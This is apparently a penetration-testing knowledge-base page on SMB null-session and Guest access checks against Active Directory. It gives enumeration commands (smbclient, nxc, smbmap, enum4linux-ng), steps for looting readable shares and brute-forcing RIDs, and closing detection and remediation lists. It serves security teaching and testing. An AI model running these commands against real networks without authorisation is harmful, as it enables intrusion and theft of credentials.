Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Techniques

Guest & Null

SMB null and Guest access checks determine whether the domain exposes data without real credentials.

This is one of the first checks because it can produce shares, usernames, domain policy, or readable files before authentication.

To clarify a common misunderstanding: Null and Guest are not the same thing and should both be tested individually.


Null Session Checks

smbclient -L //10.10.10.200 -N
nxc smb 10.10.10.200 -u '' -p '' --shares
smbmap -H 10.10.10.200 -u '' -p ''
enum4linux-ng -A 10.10.10.200

Success looks like:

share listing
domain name
user list
password policy

Failure looks like:

NT_STATUS_ACCESS_DENIED
STATUS_LOGON_FAILURE

Failure is normal on a hardened domain.


Guest Checks

smbclient -L //10.10.10.200 -U 'guest%'
nxc smb 10.10.10.200 -u 'guest' -p '' --shares
smbmap -H 10.10.10.200 -u 'guest' -p ''
enum4linux-ng -u guest -p '' -A 10.10.10.200

Try common casing:

nxc smb 10.10.10.200 -u Guest -p ''
nxc smb 10.10.10.200 -u guest -p ''

Share Enumeration

If a share is readable:

smbmap -H 10.10.10.200 -u 'guest' -p '' -R --dir-only
smbclient //10.10.10.200/Public -U 'guest%' -c 'recurse; ls'

Pull only files that matter:

smbclient //10.10.10.200/Public -U 'guest%' -c 'get readme.txt'

Look for:

passwords
scripts
configuration files
VPN notes
database connection strings
deployment files
certificates

Common Follow-Up

If Guest access works, immediately check:

nxc smb 10.10.10.200 -u 'guest' -p '' --users
nxc smb 10.10.10.200 -u 'guest' -p '' --rid-brute
nxc smb 10.10.10.200 -u 'guest' -p '' --pass-pol

If users are found, move to username enumeration, ASREP roasting, and password policy checks.


Detection

Defenders look for:

  • Security 4624 with anonymous or Guest logons
  • Security 4625 for failed null/Guest attempts
  • Security 5140 for share access
  • Security 5145 for file share object access
  • SMB connections from unmanaged hosts

Remediation

  • disable Guest access
  • restrict anonymous enumeration
  • remove Everyone or Guest permissions from shares
  • require authentication for all SMB access
  • audit shares for readable sensitive files
  • enforce SMB signing where possible